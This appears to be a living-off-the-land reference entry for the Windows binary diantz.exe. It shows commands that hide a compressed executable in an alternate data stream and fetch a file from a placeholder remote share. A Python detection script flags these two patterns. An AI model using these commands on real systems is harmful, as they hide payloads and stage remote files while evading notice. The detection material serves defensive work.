Privilege-escalation Windows

~/ cat Diantz.exe.md

Binary that packages existing files into a cabinet (.cab) file.

Paths:

c:\windows\system32\diantz.exe
c:\windows\syswow64\diantz.exe

Detection: diantz writing its output into an alternate data stream; diantz reading a source file from a remote machine or the internet.

Alternate data streams

Compress the target file into a cab file stored in an Alternate Data Stream (ADS) of another file.

diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab

Download

Download and compress a remote file and store it in a cab file on the local machine.

diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
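The two detection ideas listed above (ADS destination, remote source) written out as a small check over process-creation command lines. This is an added example, not part of the original page; the event records are constructed, and the argument handling assumes that diantz arguments beginning with "/" are switches and that the remaining positional arguments are source file(s) followed by the destination.

```python
"""Flag diantz.exe command lines whose destination is an NTFS alternate data
stream or whose source is a UNC path to a remote machine.
Sample events below are constructed for this example, not real telemetry."""
import re
import shlex
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Image name check: bare "diantz.exe" or any path ending in it (case-insensitive).
DIANTZ_IMAGE = re.compile(r"(^|[\\/])diantz(\.exe)?$", re.IGNORECASE)
# Destination on a drive-letter path that carries a second colon: file.txt:stream
ADS_TARGET = re.compile(r"^[a-z]:\\[^:]*:[^\\:]+$", re.IGNORECASE)
# Source beginning with \\host\share (UNC path to a remote machine)
UNC_SOURCE = re.compile(r"^\\\\[^\\]+\\")


@dataclass(frozen=True)
class Finding:
    rule: str      # which detection idea fired
    detail: str    # the argument that triggered it


def split_windows_cmdline(cmdline: str) -> List[str]:
    """Tokenise a Windows command line without treating backslashes as escapes."""
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def analyze_diantz(cmdline: str) -> List[Finding]:
    """Return findings for one command line; empty if not diantz or nothing suspicious."""
    argv = split_windows_cmdline(cmdline)
    if not argv or not DIANTZ_IMAGE.search(argv[0]):
        return []
    # Assumption: arguments starting with '/' are switches; the rest are
    # source file(s) followed by the destination.
    positional = [a for a in argv[1:] if not a.startswith("/")]
    if len(positional) < 2:          # e.g. only a directive file was given
        return []
    sources, destination = positional[:-1], positional[-1]
    findings = []
    if ADS_TARGET.match(destination):
        findings.append(Finding("diantz_ads_write", destination))
    findings.extend(Finding("diantz_remote_source", s)
                    for s in sources if UNC_SOURCE.match(s))
    return findings


def scan_events(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Run analyze_diantz over process-creation records; return (EventId, rule, detail)."""
    hits = []
    for ev in events:
        for f in analyze_diantz(ev["CommandLine"]):
            hits.append((ev["EventId"], f.rule, f.detail))
    return hits


# Constructed sample process-creation records (EventId and CommandLine only).
SAMPLE_EVENTS = [
    {"EventId": "1", "CommandLine": r'"C:\Windows\System32\diantz.exe" c:\users\public\report.exe c:\users\public\notes.txt:notes.cab'},
    {"EventId": "2", "CommandLine": r"diantz.exe \\fileserver\share\tool.exe c:\users\public\tool.cab"},
    {"EventId": "3", "CommandLine": r"diantz.exe /F c:\build\files.ddf"},
    {"EventId": "4", "CommandLine": r"makecab.exe c:\logs\app.log c:\archive\app.cab"},
    {"EventId": "5", "CommandLine": r"diantz.exe c:\logs\app.log c:\archive\app.cab"},
]

if __name__ == "__main__":
    for event_id, rule, detail in scan_events(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule} -> {detail}")
```

Events 1 and 2 produce one finding each; events 3 to 5 (a directive-file build, a different image, and a plain local compression) produce none. The ADS rule only recognises drive-letter destinations, so a destination given as a UNC or relative path with a stream suffix would need an extra pattern in a real deployment.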